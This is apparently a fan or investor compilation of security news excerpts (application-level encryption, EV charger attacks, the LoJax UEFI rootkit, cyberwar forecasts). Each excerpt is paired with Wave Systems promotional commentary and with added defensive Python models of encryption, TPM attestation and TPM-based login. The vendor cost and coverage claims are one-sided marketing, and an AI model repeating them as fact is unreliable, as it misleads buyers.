It’s almost as easy as it sounds. TPMs and SEDs are built to open, vendor-neutral industry standards, and so are Wave solutions. That means Wave works on your existing mix of hardware, across platforms, and will evolve with you. It’s part of what makes the Wave alternative not only more secure, but also simpler and cheaper. Total cost of ownership for Wave data protection can be almost half that of a traditional software-based system.
Questions? Read on, or contact our sales department.
Happy New Year! see post
The Best Data Breach Tactics to Deploy Now
https://www.infosecurity-magazine.com/opinions/data-breach-tactics-deploy/?utm_source=dlvr.it&utm_medium=twitter
A top-of-mind question for business leaders across all industries is how to eliminate the risk of a data breach. In addition to removing sensitive data from your business process, there are two other tactics you should deploy: application-level encryption and strong authentication.
Though it is generally accepted that encrypting sensitive data will protect your organization, most people in the security business don’t realize that not all encryption is equal. Even when using NIST-approved algorithms with the largest key sizes available, data is still at risk.
How is that possible? Well, all other things being equal in the cryptographic sense, two design decisions matter when encrypting data: 1) Where the data is being cryptographically processed and 2) How are cryptographic keys being managed?
First, let’s address processing. If data is encrypted and decrypted in any part of the system (e.g., the hard disk drive, operating system, database) other than the business application using that data, significant residual risks remain despite the encryption.
An attacker needs only to compromise a software layer above the encrypting layer to see unencrypted (plaintext) data, because the decrypting layer below will already have decrypted the sensitive data before sending it to the layer above in the stack.
Since the application layer is the highest layer in the technology stack, this makes it the most logical place to protect sensitive data, as it affords the attacker the smallest target (in order to compromise sensitive data within the application layer, the attacker will have had to find a vulnerability within the application – or the administrator's credential – and access regions of memory accessible only to the application or the administrator).
This also ensures that, once data leaves the application layer, it is protected no matter where it goes (and conversely, must come back to the application layer to be decrypted).
In terms of how cryptographic keys are managed and protected, if you use a general-purpose file, keystore, database or device to store your keys, this would be the equivalent of leaving company cash in a general-purpose desk or drawer. In the same way that you need a safe to store cash in a company, you need a purpose-built key management solution designed with hardened security requirements to protect cryptographic keys.
These solutions have controls to ensure that, even if someone gains physical access to the device, gaining access to the keys will range from very hard to nearly impossible. If the key management system cannot present sufficiently high barriers, even billion-dollar companies will fail to protect sensitive data – as many recently have and continue to do.
Though the details and complexity of cryptography can seem taxing, it is important to recognize that an encryption solution provides the last bastion of defense against determined attackers. It is well worth a company’s time to give both application-level encryption and key management the proper attention.
While encryption is a best practice, so is strong authentication. In fact, it should be the first line of defense. Strong authentication is the ability to use different cryptographic keys combined with secure hardware (in the possession of the user) to confirm that the user is who they claim to be.
While digital certificates on smartcards provided such capability for over two decades, they are expensive and difficult to use and support, even in highly technical environments. The FIDO Alliance is attempting to simplify this problem by eliminating passwords entirely; some early solutions have already made it to market this year, with successful deployments under way.
With strong authentication as the first line of defense and application-level encryption backing it up, even if an attacker managed to slip past network defenses – as they always seem to do – there will be little opportunity to compromise sensitive data.
While no security technology is absolutely fool-proof, when implemented correctly, these two security technologies raise the bar sufficiently high to “encourage” the vast majority of attackers to move onto easier targets.
=================================================================
It's interesting that two of Wave's products, Wave VSC 2.0 (2FA) and Wave SED management (encryption) provide premier protection that could be used to thwart attackers. This article basically discusses the same strategy (2FA and encryption) that Wave had long ago for protecting sensitive information. Better security at less than half the cost. Wave has better backing in ESW Capital than a company like StrongKey (company of writer). imo. To see Wave's two flagship products essentially confirmed in an article like this for protecting sensitive information is great.
==================================================================
https://www.wavesys.com/products/wave-virtual-smart-card
https://www.wavesys.com/products/wave-self-encrypting-drive-management
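The two design decisions the Infosecurity article raises (at which layer data is decrypted, and who is allowed to use the key) as an added Python model; this is example code, not from the article, its author's company or Wave. A disk-encrypted volume hands plaintext to any process that reads through the OS once it is mounted; an application that encrypts before writing leaves only ciphertext below itself; and a key service that checks the calling identity refuses a principal that is not the application. Class names, paths and the "backup-agent" principal are invented. The cipher is HMAC-SHA256 in counter mode with a separately derived authentication key, chosen only because the standard library has no AES; production code should use AES-GCM from a vetted library. The authentication tag also detects in-place modification of stored data, which is the tampering scenario of the "Toxic Data" post earlier on this page.

```python
import hashlib
import hmac
import secrets

# --- cipher stand-in (assumption: HMAC-CTR + encrypt-then-MAC, not AES) -----
def _subkey(master, label):
    """Derive independent encryption and MAC keys from one 32-byte master key."""
    return hmac.new(master, label, hashlib.sha256).digest()

def _keystream(key, nonce, length):
    blocks, counter = [], 0
    while sum(len(b) for b in blocks) < length:
        blocks.append(hmac.new(key, nonce + counter.to_bytes(4, "big"), hashlib.sha256).digest())
        counter += 1
    return b"".join(blocks)[:length]

def seal(master, plaintext):
    """nonce(16) || ciphertext || tag(32)."""
    nonce = secrets.token_bytes(16)
    stream = _keystream(_subkey(master, b"enc"), nonce, len(plaintext))
    ct = bytes(p ^ k for p, k in zip(plaintext, stream))
    tag = hmac.new(_subkey(master, b"mac"), nonce + ct, hashlib.sha256).digest()
    return nonce + ct + tag

def unseal(master, blob):
    nonce, ct, tag = blob[:16], blob[16:-32], blob[-32:]
    expected = hmac.new(_subkey(master, b"mac"), nonce + ct, hashlib.sha256).digest()
    if not hmac.compare_digest(tag, expected):
        raise ValueError("authentication failed: stored data was modified")
    stream = _keystream(_subkey(master, b"enc"), nonce, len(ct))
    return bytes(c ^ k for c, k in zip(ct, stream))

# --- key custody: the "safe" rather than the "desk drawer" -------------------
class KeyService:
    """Models a purpose-built key manager: key bytes never leave this object,
    and each key can be used only by the identities registered for it."""
    def __init__(self):
        self._keys, self._acl = {}, {}

    def create_key(self, key_id, *allowed_callers):
        self._keys[key_id] = secrets.token_bytes(32)
        self._acl[key_id] = set(allowed_callers)

    def _check(self, caller, key_id):
        if caller not in self._acl.get(key_id, ()):
            raise PermissionError(f"{caller!r} may not use key {key_id!r}")

    def encrypt(self, caller, key_id, data):
        self._check(caller, key_id)
        return seal(self._keys[key_id], data)

    def decrypt(self, caller, key_id, blob):
        self._check(caller, key_id)
        return unseal(self._keys[key_id], blob)

# --- where the cryptographic processing happens ------------------------------
class DiskEncryptedVolume:
    """Disk-layer encryption: once mounted, the volume decrypts for any
    process reading through the OS. Protects a lost drive, not a live host."""
    def __init__(self):
        self._key = secrets.token_bytes(32)
        self._sectors = {}

    def write(self, path, data):
        self._sectors[path] = seal(self._key, data)

    def read(self, path):
        return unseal(self._key, self._sectors[path])   # plaintext for every caller above

class Application:
    """Application-layer encryption: the app is the only principal allowed to
    use its key, so every layer below it (OS, backup, DBA) sees ciphertext."""
    def __init__(self, name, kms, key_id, volume):
        self.name, self.kms, self.key_id, self.volume = name, kms, key_id, volume

    def store(self, path, data):
        self.volume.write(path, self.kms.encrypt(self.name, self.key_id, data))

    def load(self, path):
        return self.kms.decrypt(self.name, self.key_id, self.volume.read(path))

def demo(secret=b"card=4111-1111-1111-1111"):
    """Compare what an OS-level reader sees under each design, and whether a
    non-application principal can get the key service to decrypt for it."""
    kms, vol = KeyService(), DiskEncryptedVolume()
    kms.create_key("billing-k1", "billing-app")
    vol.write("/data/disk_only.txt", secret)                # disk encryption only
    app = Application("billing-app", kms, "billing-k1", vol)
    app.store("/data/app_level.txt", secret)                # app-level on top of it
    os_view_disk = vol.read("/data/disk_only.txt")
    os_view_app = vol.read("/data/app_level.txt")
    try:
        kms.decrypt("backup-agent", "billing-k1", os_view_app)
        leaked = True
    except PermissionError:
        leaked = False
    return {
        "os_reader_sees_plaintext_with_disk_encryption": os_view_disk == secret,
        "os_reader_sees_plaintext_with_app_encryption": os_view_app == secret,
        "unauthorised_caller_decrypts": leaked,
        "app_roundtrip_ok": app.load("/data/app_level.txt") == secret,
    }
```

Run `demo()` to see the contrast: the same record is plaintext to an OS-level reader under disk encryption alone and ciphertext under application-level encryption, and the key service, not the application, is where the caller identity is enforced.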
Smart home charging networks vulnerable to cyber attacks
https://www.electrive.com/2018/12/16/smart-home-charging-networks-vulnerable-to-cyber-attacks/
Kaspersky Lab, an IT specialist firm from Russia, warns that electric vehicle chargers supplied by a “major vendor” are vulnerable to cyber attacks that could damage the home grid. Experts from Fraunhofer SIT have looked into the issue as well and developed a solution scenario.
While the Fraunhofer experts have been modelling said cyber attacks on charging stations, the engineers from Kaspersky Lab practically managed to break into home charging systems currently on the market.
Particularly one provider exhibited problems the experts say, but they have since all been solved. While the press release does not state the name of the supplier, a paper detailing the analysis has ChargePoint’s Home charging station at the centre.
However, Kaspersky Labs warns in general that while electric cars are being fire-walled regularly, so to speak, charging stations, particularly those enabling remote operation, are vulnerable to attacks.
For example, the researchers found a way to initiate commands on the charger and to either stop the charging process or set it to the maximum current possible. While the first option would only prevent a person from using the electric car, the second one could potentially cause the wires to overheat on a device that is not protected by a trip fuse.
All an attacker needs to do to change the amount of electricity being transmitted is obtain Wi-Fi access to the network the charger is connected to. Since the devices are made for home use, security for the wireless network is likely to be limited. This means that attackers could gain access easily, for example by bruteforcing all possible password options, which is quite common: according to Kaspersky Lab statistics 94% of attacks on IoT in 2018 used this method. Once inside the home network, the intruders can easily find the charger’s IP-address and then exploit any vulnerabilities.
For home users, Kaspersky Labs recommends regularly updating all smart devices to the latest software versions. Moreover, using strong passwords but also isolating the smart home network from the network used by the personal devices for basic Internet searching is advisable.
Meanwhile, experts at Fraunhofer SIT have been looking into similar issues, however concentrating on public devices. Like Kaspersky, Fraunhofer SIT also assumes that charging stations are an easy target for IT-based attacks. Yet, in this case, hackers could manipulate the charging stations to charge for free indefinitely or to capture personal data for example.
To prevent such attacks, they modelled a solution that was recently presented at a conference in Berlin and is called the Trusted Platform Module. The hardware connects to the charging station permanently and enables remote checking of whether the charging station firmware remains in perfect condition.
The Fraunhofer solution was developed as part of the DELTA project (data security and integrity in electric mobility) that looks at charging and billing in compliance with legal metrology (Eichrecht).
=================================================================
If the TPM is used in checking firmware integrity, shouldn't this application be phenomenally impacting TPMs across the globe?! Shouldn't all TPMs be enabled by now?! Wave could help with turning on TPMs by using ERAS and Wave ESC could manage the TPM.
=================================================================
ERAS can turn on TPMs in large numbers.
https://www.wavesys.com/products/embassy%C2%AE-remote-administration-server-tpm-management
Excerpt:
Here’s how it works:
Trusted Platform Module (TPM) + Wave’s ERAS for TPM Management = hardware-secured, fully-managed authentication
Most of your devices already come with TPMs (check out our “What is a TPM?” brochure if you’re not sure why this is exciting). This security chip comes attached to the motherboard of most enterprise-class PCs. There’s nothing “add-on” about it. The TPM provides a verifiable, unique identity for each machine.
Excerpt:
Token-free, password-free user authentication
We know you’ve dreamt about shredding your list of passwords. Go on and do it.
Because you are starting the authentication process in the device’s hardware, the user doesn’t have to interact with it. All users see is their usual Windows log-in screen – no more additional passwords to access the VPN or other resources. They just sign in once, and the secure credentials in their TPMs securely and quickly connect them to everything they need. Say goodbye to user frustration and slow OS performance.
First-Ever UEFI Rootkit Tied to Sednit APT
https://threatpost.com/uefi-rootkit-sednit/140420/
Researcher at ESET outlines research on the first successful UEFI rootkit used in the wild.
LEIPZIG, GERMANY – Researchers hunting cyber-espionage group Sednit (an APT also known as Sofacy, Fancy Bear and APT28) say they have discovered the first-ever instance of a rootkit targeting the Windows Unified Extensible Firmware Interface (UEFI) in successful attacks.
The discussion of Sednit was part of the 35C3 conference, and a session given by Frédéric Vachon, a malware researcher at ESET who published a technical write-up on his findings earlier this fall (PDF). During his session, Vachon said that finding a rootkit targeting a system’s UEFI is significant, given that rootkit malware programs can survive on the motherboard’s flash memory, giving it both persistence and stealth.
“UEFI rootkits have been researched and discussed heavily in the past few years, but sparse evidence has been presented of real campaigns actively trying to compromise systems at this level,” he said.
The rootkit is named LoJax. The name is a nod to the underlying code, which is a modified version of Absolute Software’s LoJack recovery software for laptops. The purpose of the legitimate LoJack software is to help victims of a stolen laptop be able to access their PC without tipping off the bad guys who stole it. It hides on a system’s UEFI and stealthily beacons its whereabouts back to the owner for possible physical recovery of the laptop.
Each time the system restarts, the code executes on boot, before the OS loads and before the system’s antivirus software is launched. That means that even if the device’s hard drive is replaced, the LoJack software will still operate.
According to Vachon, the bad guys are making good use of this with LoJax. This weaponized, customized version of Absolute Software’s wares dates back to a vulnerable 2009 version, which had several key bugs, chief among them a configuration module that was poorly secured with weak encryption.
“This vulnerability allowed Sednit to customize a single byte that contains the domain information for the legitimate software to connect to in order to download the recovery software,” he said. In the case of LoJax, the single byte contained Sednit command-and-control domains that ultimately delivered the rootkit payload.
The infection chain is typical: An attack begins with a phishing email or equivalent, successfully tricking a victim into downloading and executing a small rpcnetp.exe dropper agent. The rpcnetp.exe installs and reaches out to the system’s Internet Explorer browser, which is used to communicate with the configured domains.
“Once I have a foothold on the machine I can use this tool to deploy the UEFI rootkit,” Vachon explained, adding that the hacker tool takes advantage of firmware vendors allowing remote flashing. “UEFI rootkit is located in the BIOS region of the serial peripheral interface (SPI) flash memory,” he said.
Once the UEFI rootkit is installed, there’s not much a user can do to remove it besides re-flashing the SPI memory or throwing out the motherboard, Vachon said.
In May, Arbor Networks spotted LoJack being reused by Sednit agents to develop LoJax. But it wasn’t until September that Sednit began to use it in live campaigns, observed by ESET. These are targeting mostly government entities located in the Balkans, as well as Central and Eastern Europe.
ESET said it identified a customer who had been infected by the rogue version of the LoJax. And last month, the Pentagon made a good-faith gesture to be more open and started uploading malware samples from APTs and other nation-state sources to the website VirusTotal. The first two samples were rpcnetp.dll and rpcnetp.exe, which are both detected as dropper mechanisms for the UEFI rootkit.
By enabling Windows Secure Boot, and making sure their UEFI firmware is up to date, end users can protect themselves against attack, Vachon said.
==================================================================
It would make sense that, after Secure Boot and the TPM are enabled on Windows 8.1, Windows 7 machines should have their TPMs activated as well. With Windows 10 TPMs being enabled as well, Wave ERAS could have helped in activating a full fleet (Windows 7, 8, 8.1 and 10) of computer TPMs in a company, such that they are able to keep unknown devices off the company/organization's network. In short, organizations only having TPMs activated on Windows 8.1 (rather than the full range of OSes: 7, 8, 8.1, and 10) could be missing out on better cybersecurity. Organizations having Wave VSC 2.0 and Wave Endpoint Monitor also would enhance their cybersecurity posture. imo.
=================================================================
https://www.wavesys.com/products/embassy%C2%AE-remote-administration-server-tpm-management
Excerpt:
Wave’s ERAS for TPM Management gives IT remote, centralized management of all TPMs on enterprise computers and tablets.
With this control, IT can set policies and dictate which machines and users have authority to access which resources. IT can ensure that only known and approved devices are accessing your network. And what’s more, IT can prove it with detailed activity logs.
==================================================================
https://www.wavesys.com/products/wave-virtual-smart-card
https://www.wavesys.com/products/wave-endpoint-monitor
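What "checking remotely whether the firmware remains in perfect condition" with a TPM amounts to, for both the Fraunhofer charging-station post earlier and the LoJax post above, as an added Python example (constructed event data; not code from Fraunhofer SIT, ESET or Wave). Each boot stage hashes the next component and extends the digest into a Platform Configuration Register; because extend is one-way and order-sensitive, an altered module in the SPI-flash BIOS region or a disabled Secure Boot policy changes the register values, and a verifier that replays a known-good event log sees the difference. PCR indices follow the TCG PC Client convention (PCR0 for firmware code, PCR4 for the boot manager, PCR7 for Secure Boot policy); the TPM's signed quote over the PCRs is assumed here rather than verified.

```python
import hashlib

def measure(data):
    """Digest of a component, computed by the firmware before it extends."""
    return hashlib.sha256(data).digest()

def extend(pcr, digest):
    """TPM2_PCR_Extend on the SHA-256 bank: PCR_new = H(PCR_old || digest).
    There is no way to set a PCR to a chosen value, only to extend it."""
    return hashlib.sha256(pcr + digest).digest()

def replay(event_log):
    """Recompute every PCR from an event log of (pcr_index, description, data)."""
    pcrs = {}
    for index, _description, data in event_log:
        pcrs[index] = extend(pcrs.get(index, bytes(32)), measure(data))
    return pcrs

def attest(quoted_pcrs, golden_pcrs):
    """Verifier logic: the PCR indices whose quoted value differs from the
    known-good value. An empty list means the platform booted as expected."""
    return sorted(i for i in golden_pcrs if quoted_pcrs.get(i) != golden_pcrs[i])

def log_matches_quote(event_log, quoted_pcrs):
    """The event log is untrusted input from the platform; it is believed
    only if replaying it reproduces the values the TPM itself quoted."""
    return replay(event_log) == quoted_pcrs

# Constructed boot event logs (illustrative strings, not real measurements).
CLEAN_BOOT = [
    (0, "firmware core (SEC/PEI)",   b"platform-fw-core 1.04"),
    (0, "DXE driver: network stack", b"platform-net-dxe 1.04"),
    (7, "Secure Boot policy",        b"SecureBoot=1 db=[OEM,Microsoft]"),
    (4, "boot manager",              b"bootmgfw.efi"),
]
# Same platform after a module in the BIOS region of SPI flash was altered.
IMPLANTED_BOOT = [(i, d, data + b" +implant" if d.startswith("DXE") else data)
                  for i, d, data in CLEAN_BOOT]
# Same platform with Secure Boot switched off.
SECURE_BOOT_OFF = [(i, d, b"SecureBoot=0" if i == 7 else data)
                   for i, d, data in CLEAN_BOOT]

GOLDEN = replay(CLEAN_BOOT)   # recorded once from a trusted reference build

def remote_check(event_log):
    """Simulate one remote check: the platform quotes its PCRs and sends its log."""
    quote = replay(event_log)   # a real TPM signs this together with a verifier nonce
    return {
        "changed_pcrs": attest(quote, GOLDEN),
        "log_consistent_with_quote": log_matches_quote(event_log, quote),
    }
```

A platform that booted the implanted firmware but sends the clean log to hide it fails `log_matches_quote(CLEAN_BOOT, replay(IMPLANTED_BOOT))`, which is why the quoted PCR values, not the log, are the thing the verifier trusts. Re-flashing the SPI memory, the remedy Vachon describes, is what brings PCR0 back to the golden value.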
How to Use Multi-Factor Authentication When You Don't Have Cell Phone Access
https://www.business2community.com/cybersecurity/how-to-use-multi-factor-authentication-when-you-dont-have-cell-phone-access-02153446
4 benefits that Wave VSC 2.0 has over what is in this article:
1. No phone needed for SMS and Wave VSC 2.0 doesn't present a problem when the cell phone has no access.
2. Simpler to set up and use. imo.
3. No token needed (or to lose) because the TPM provides the second factor of authentication.
4. 'Sometimes you will have to go through the full recovery process for each account you've secured using a third party provider.' Wave VSC 2.0 recovery process is simpler and more effective. imo.
================================================================
https://www.wavesys.com/products/wave-virtual-smart-card
Get better security at less than half the cost
Passwords are weak. Tokens are expensive. Don’t compromise on security or price.
Wave Virtual Smart Card does anything your physical smart cards and tokens do, but it starts with hardware you already have: the Trusted Platform Module (TPM), a hardware security chip built into the motherboard of most business-class PCs. You may not even know you have it, but once you do, the TPM can be used in a myriad of ways. Wave turns it into a smart card, embedded directly into your laptop.
What can it be used for?
What do you use your smart card for today? With the exception of keying open the door at work, Wave Virtual Smart Card can perform any of the services or applications you rely on your smart card for today. Secure VPN, WiFi, remote desktop, cloud applications – it can all be done with a virtual smart card.
One helpdesk call you'll never get: "I lost my virtual smart card again..."
There are so many ways to lose a token – couch cushions, street drains, curious toddlers. In fact, up to 30% of all tokens are eventually lost. It’s much harder to lose a laptop, and you notice a lot faster when you do.
The user experience with a virtual smart card is simple: he or she logs in with a PIN (authentication factor number one). The TPM (authentication factor number two) then transparently identifies the device to the network and connects the user to all the approved services. It’s one less thing for users to carry around.
What will you do with >50% TCO savings?*
Tokens and smart cards require an additional hardware purchase, plus the time and money to ship to remote users. Use something that’s already in the users’ hands (the TPM), and your acquisition and deployment costs are lower.
Then consider the management savings in not having to replace lost and stolen tokens. That means fewer helpdesk calls, less interruption of user productivity, and fewer acquisition and shipping costs.
When we say “secure”…
…we mean it. Our solution starts with a proven hardware root-of-trust. Multi-factor authentication is an established best-practice for strong authentication: the TPM-based virtual smart card is one factor (something you have) and the user PIN is a second factor (something you know).
*Actual number may vary. Contact us today to receive more details and a free quote.
Key Features:
Full lifecycle management of virtual smart cards
• Intuitive interface to create (or delete) virtual smart cards
• Command line option to create and delete virtual smart cards
• Flexible PIN policies
• Helpdesk-assisted PIN reset and recovery
• Generates reports for compliance
• Integrates with Active Directory
• Supports familiar use cases:
  - Virtual Private Network (VPN)
  - Local logon
  - Remote logon
  - Remote desktop access
  - Intranet/Extranet
  - Cloud applications
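A model of the PIN-plus-TPM login the product page describes, added as an example and not Wave's code. The key is generated inside a simulated TPM and never exported; using it requires the PIN; repeated wrong PINs trip the TPM's dictionary-attack lockout; and the device signs the server's challenge together with the origin the browser actually connected to, so a signature obtained through a look-alike site does not verify at the real one (the channel-binding idea behind the FIDO approach mentioned in the Infosecurity post earlier). HMAC stands in for the TPM's asymmetric key, so the verifier is assumed to receive the same secret once at enrolment; the lockout threshold, origins and device names are constructed.

```python
import hashlib
import hmac
import secrets

class SimulatedTPM:
    """Stand-in for the TPM. The key is created inside and never exported;
    signing needs the PIN (the key's auth value), and repeated wrong PINs
    trip the dictionary-attack lockout. HMAC replaces the asymmetric key a
    real TPM would hold (assumption for this example)."""
    MAX_FAILURES = 5   # constructed threshold; on real TPMs this is policy

    def __init__(self, pin):
        self._key = secrets.token_bytes(32)
        self._pin_hash = hashlib.sha256(pin.encode()).digest()
        self.failures = 0
        self.locked = False

    def enrolment_material(self):
        # A real TPM would release only the public half of the key here.
        return self._key

    def sign(self, pin, message):
        if self.locked:
            raise PermissionError("TPM is in dictionary-attack lockout")
        if not hmac.compare_digest(hashlib.sha256(pin.encode()).digest(), self._pin_hash):
            self.failures += 1
            self.locked = self.failures >= self.MAX_FAILURES
            raise PermissionError("wrong PIN")
        self.failures = 0
        return hmac.new(self._key, message, hashlib.sha256).digest()


class Verifier:
    """The relying party (VPN, cloud app). Every challenge is single-use and
    is checked against the verifier's own origin."""
    def __init__(self, origin):
        self.origin = origin
        self._devices = {}
        self._pending = {}

    def enrol(self, device_id, material):
        self._devices[device_id] = material

    def challenge(self, device_id):
        nonce = secrets.token_bytes(32)
        self._pending[device_id] = nonce
        return nonce

    def verify(self, device_id, signature):
        nonce = self._pending.pop(device_id, None)   # consumed: no replay
        if nonce is None or device_id not in self._devices:
            return False
        expected = hmac.new(self._devices[device_id],
                            self.origin.encode() + nonce, hashlib.sha256).digest()
        return hmac.compare_digest(expected, signature)


def login(tpm, pin, device_id, verifier, origin_in_browser):
    """Client side. The signature covers the origin the browser really
    connected to, so a challenge relayed through a look-alike domain yields
    a signature the genuine verifier rejects."""
    nonce = verifier.challenge(device_id)
    try:
        signature = tpm.sign(pin, origin_in_browser.encode() + nonce)
    except PermissionError:
        return False
    return verifier.verify(device_id, signature)


def scenarios():
    """Genuine login, relayed login via a look-alike site, and PIN guessing."""
    tpm = SimulatedTPM(pin="2468")
    bank = Verifier("https://bank.example")
    bank.enrol("laptop-17", tpm.enrolment_material())
    results = {
        "genuine_site": login(tpm, "2468", "laptop-17", bank, "https://bank.example"),
        "look_alike_site": login(tpm, "2468", "laptop-17", bank, "https://bank-login.example"),
    }
    for _ in range(SimulatedTPM.MAX_FAILURES):
        login(tpm, "0000", "laptop-17", bank, "https://bank.example")
    results["locked_after_guessing"] = tpm.locked
    results["correct_pin_while_locked"] = login(tpm, "2468", "laptop-17", bank, "https://bank.example")
    return results
```

The two properties worth noting are that the PIN alone is useless without the physical device holding the key, and that the device's key is useless to a site the browser did not really connect to; both follow from where the key lives and what the signature covers, not from keeping the PIN secret from the server.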
Cyberwar predictions for 2019: The stakes have been raised
https://www.zdnet.com/article/cyberwar-predictions-for-2019-the-stakes-have-been-raised/
Cybersecurity will define many of the international conflicts of the future. Here's an overview of the current threat landscape, UK and US policy in this area, and some expert predictions for the coming year.
Before the internet era, geopolitical tensions drove traditional espionage, and periodically erupted into warfare. Nowadays, cyberspace not only houses a treasure-trove of commercially and politically sensitive information, but can also provide access to control systems for critical civil and military infrastructure. So it's no surprise to find nation-state cyber activity high on the agendas of governments.
Notable cyber attacks launched by nation states in recent years include: Stuxnet (allegedly by Israel and the US); DDoS attacks against Estonia, attacks against industrial control systems for power grids in Ukraine, and electoral meddling in the US (allegedly by Russia); and the global WannaCry attack (allegedly by North Korea). China, meanwhile, has been accused of multiple intellectual property theft attacks and, most recently (and controversially), of secreting hardware backdoors into Supermicro servers.
The global cyber-threat landscape
What does the current threat landscape look like, in broad terms? The 2017/18 threat matrix from BRI (Business Risk Intelligence) company Flashpoint provides a useful overview:
Threat actors are ranked on a six-point capability scale and a four-point potential impact scale, with Flashpoint's cast ranging from Tier 2 capability/Negligible potential impact (Jihadi hackers) to Tier 6/Catastrophic impact (China, Russia and Five Eyes).
It's probably no surprise to find China heading the 2017/18 ranking of threat actors, in terms of capability, potential impact and number of verticals targeted:
In its 2018 mid-year update, Flashpoint highlighted various 'bellwethers' that may prompt "major shifts in the cyber threat environment":
• The tentative rapprochement between the U.S., South Korea, and North Korea fails to result in tangible diplomatic gains to end the North Korean nuclear program.
• Additional states follow the U.S. example and relocate their embassy in Israel to Jerusalem.
• The U.S.' official withdrawal from the Joint Comprehensive Plan of Action (JCPOA) and the subsequent renewal of economic sanctions prompts an Iranian response.
• The ongoing power struggle between Saudi Arabia and Iran for influence in the Middle East leads to kinetic conflict in the region.
• U.S. and European Union-led economic sanctions in place on Russia are extended or tightened.
• The Trump administration adopts a less-compromising approach toward U.S.-China relations or otherwise enacts policies that threaten Chinese core interests. Alternatively, China adopts an increasingly aggressive policy toward securing its vital core interests, including the South China Sea and the questions of Taiwan's and Hong Kong's political sovereignty.
• The situation in Syria further deteriorates into direct armed conflict between major states with differing interests in the region, potentially extending further into neighboring states.
• Other nation-states, such as China, Iran, and North Korea adopt the Russian model of engaging in cyber influence operations via proxies, resulting in the exposure of such a campaign.
Cybersecurity policy in the UK
In the UK, the National Cyber Security Centre (NCSC) -- an amalgam of CESG (the information security arm of GCHQ), the Centre for Cyber Assessment, CERT-UK, and the Centre for the Protection of National Infrastructure -- issues periodic security advisories, among other services. In April, for example, it warned of hostile state actors compromising UK organisations, with a focus on engineering and industrial control companies. Specifically, the threats involved "the harvesting of NTLM credentials via Server Message Block (SMB) using strategic web compromises and spear-phishing". Other recent NCSC advisories have highlighted Russian state-sponsored cyber actors targeting network infrastructure devices and the activities of APT28 (a.k.a. the cyber espionage group Fancy Bear).
In its 2018 annual review, the NCSC said it had dealt with over a thousand cyber incidents since its inception in 2016. "The majority of these incidents were, we believe, perpetrated from within nation states in some way hostile to the UK. They were undertaken by groups of computer hackers directed, sponsored or tolerated by the governments of those countries," said Ciaran Martin, CEO at NCSC, in the report. "These groups constitute the most acute and direct cyber threat to our national security. I remain in little doubt we will be tested to the full, as a centre, and as a nation, by a major incident at some point in the years ahead, what we would call a Category 1 attack."
A Category 1 attack constitutes a 'national cyber emergency' and results in "sustained disruption of UK essential services or affects UK national security, leading to severe economic or social consequences or to loss of life."
Despite the efforts of the NCSC, a recent report by the UK parliament's Joint Committee on the National Security Strategy noted that "The threat to the UK and its critical national infrastructure [CNI] is both growing and evolving. States such as Russia are branching out from cyber-enabled espionage and theft of intellectual property to preparing for disruptive attacks, such as those which affected Ukraine's energy grid in 2015 and 2016."
The government needs to do more to change the culture of CNI operators and their extended supply chains, the report said, adding that: "This is also a lesson for the Government itself: cyber risk must be properly managed at the highest levels."
Specifically, the Joint Committee report recommended an improvement in political leadership: "There is little evidence to suggest a 'controlling mind' at the centre of government, driving change consistently across the many departments and CNI sectors involved. Unless this is addressed, the government's efforts will likely remain long on aspiration and short on delivery. We therefore urge the government to appoint a single Cabinet Office minister who is charged with delivering improved cyber resilience across the UK's critical national infrastructure."
Cybersecurity policy in the US
In the US, the September 2018 National Cyber Strategy (the first in 15 years, according to the White House) adopted an aggressive stance, promising to "deter and if necessary punish those who use cyber tools for malicious purposes." The Trump administration is in no doubt about who the US is up against in the cyber sphere:
"The Administration recognizes that the United States is engaged in a continuous competition against strategic adversaries, rogue states, and terrorist and criminal networks. Russia, China, Iran, and North Korea all use cyberspace as a means to challenge the United States, its allies, and partners, often with a recklessness they would never consider in other domains. These adversaries use cyber tools to undermine our economy and democracy, steal our intellectual property, and sow discord in our democratic processes. We are vulnerable to peacetime cyber attacks against critical infrastructure, and the risk is growing that these countries will conduct cyber attacks against the United States during a crisis short of war. These adversaries are continually developing new and more effective cyber weapons."
The US cyber security strategy is built around four tenets: Protect the American People, the Homeland and the American Way of Life; Promote American Prosperity; Preserve Peace through Strength; and Advance American Influence.
As far as preserving 'peace through strength' is concerned, the Trump administration states that: "Cyberspace will no longer be treated as a separate category of policy or activity disjointed from other elements of national power. The United States will integrate the employment of cyber options across every element of national power." The objective is to "Identify, counter, disrupt, degrade, and deter behavior in cyberspace that is destabilizing and contrary to national interests, while preserving United States overmatch in and through cyberspace."
It would seem that the stakes in the cybersecurity/cyberwar game have just been raised by the world's most powerful nation.
2019 nation-state / cyberwar predictions
Nation-state activity has been prominent in previous annual roundups of cybersecurity predictions (2018, 2017, 2016), and given the above overview we expect plenty more in 2019. Let's examine some of the predictions in this area that have been issued so far.
see link for more including comments by FireEye.
Outlook
It's clear from the above round-up of predictions that nation states are likely to be more active than ever in cyberspace in 2019. Perhaps we'll even see the sort of 'national cyber emergency' envisaged by the UK's NCSC, with potential loss of life. That's the point where cyber attack moves towards cyberwar.
It's also clear that governments -- in the UK and US at least -- are increasingly, if belatedly, acknowledging the scale of the problem of hostile nation-state cyber activity. It remains to be seen how effectively they can defend themselves, and even retaliate.
=================================================================
After reading FireEye's points in this article it seems crazy that the U.S. and/or other countries are not using the Wave Alternative within their computer infrastructure. The TPM is ubiquitous now and available in 100% of most companies' computer fleets (therefore it can give entrance to only known computers on the network). The Wave Alternative could be so beneficial to the U.S. and other countries. The other alternatives are not working very well.
=================================================================
https://www.wavesys.com/wave-alternative
The IT perimeter is gone
With tablets, smartphones, and cloud applications, your employees can access sensitive data anytime, from anywhere. Indeed, around 70 percent of security breaches and data thefts are inside jobs. Meanwhile, the hackers only get better: advanced persistent threats (APTs) appear as normal traffic, and malware can go unnoticed for weeks.
It’s a new world, one without borders. Yet most organizations are still trying to protect their data with the same old firewalls and antivirus software. It’s not working. We refer you to the headline-making breach of the week.
You have to start with the device
Wave has an alternative: security that’s built into each and every device.
We’re talking about hardware: self-encrypting drives (SEDs), which protect data when a device is stolen or lost, and trusted platform modules (TPMs), or embedded security chips. Both go in at the factory, and increasingly, both are standard. They make it possible for you to monitor and control each individual device and its data, no matter where it is. But you need software to turn on and manage your SEDs and TPMs. Wave makes that software.
We’ve been refining comprehensive, centralized management of hardware-based security longer than anyone else. More than that, we’ve shaped the field as a founding member of the Trusted Computing Group, the not-for-profit that develops and promotes industry standards for the hardware.
Security that’s confirmed, not assumed
